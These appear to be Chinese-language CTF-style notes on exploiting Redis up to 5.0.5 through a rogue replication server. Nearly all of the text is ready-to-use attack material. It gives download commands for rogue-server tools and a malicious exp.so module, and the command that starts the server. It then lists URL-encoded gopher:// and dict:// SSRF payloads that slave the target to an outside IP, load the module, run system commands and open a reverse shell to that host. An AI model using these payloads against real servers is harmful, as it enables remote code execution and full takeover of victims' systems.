redis主从复制学习笔记

下载攻击文件 Redis(<=5.0.5) RCE

git clone https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server.git
wget https://github.com/n0b0dyCN/redis-rogue-server/raw/refs/heads/master/exp.so
把exp.so复制到文件夹里

开启服务器

python3 redis_rogue_server.py -v -path exp.so -lport 1028

攻击 redis

gopher

已知密码为123456
(可选)关闭redis只读(read only replica)
gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520replica-read-only%2520no%250d%250aquit
设置dir
gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit
设置主从关系
gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%25208.155.17.250%25201028%250d%250aquit
加载 exp 模块
gopher://127.0.0.1:6379/_auth%2520123456%250d%250amodule%2520load%2520/tmp/exp.so%250d%250aquit
退出主从同步
gopher://127.0.0.1:6379/_auth%2520123456%250d%250aslaveof%2520NO%2520ONE%250d%250aquit
导出数据库
gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520dbfilename%2520dump.rdb%250d%250aquit
执行系统命令
gopher://127.0.0.1:6379/_auth%2520123456%250d%250asystem.exec%2520%2522cat%2520%252Fflag%2522%250d%250aquit
反弹 shell
gopher://127.0.0.1:6379/_auth%2520123456%250d%250asystem.rev%25208.155.17.250%25201234%250d%250aquit

dict

dict://127.0.0.1:6379/config:set:replica-read-only:no

dict://127.0.0.1:6379/flushall
dict://127.0.0.1:6379/slaveof:8.155.17.250:1028
dict://127.0.0.1:6379/config:set:dbfilename:exp.so
dict://127.0.0.1:6379/config:set:dir:/tmp/
dict://127.0.0.1:6379/module:load:/tmp/exp.so
dict://127.0.0.1:6379/slaveof:no:one
dict://127.0.0.1:6379/config:set:dbfilename:dump.rdb
dict://127.0.0.1:6379/system.exec:"ls /"
dict://127.0.0.1:6379/system.exec:"cat /flllaaaggggg"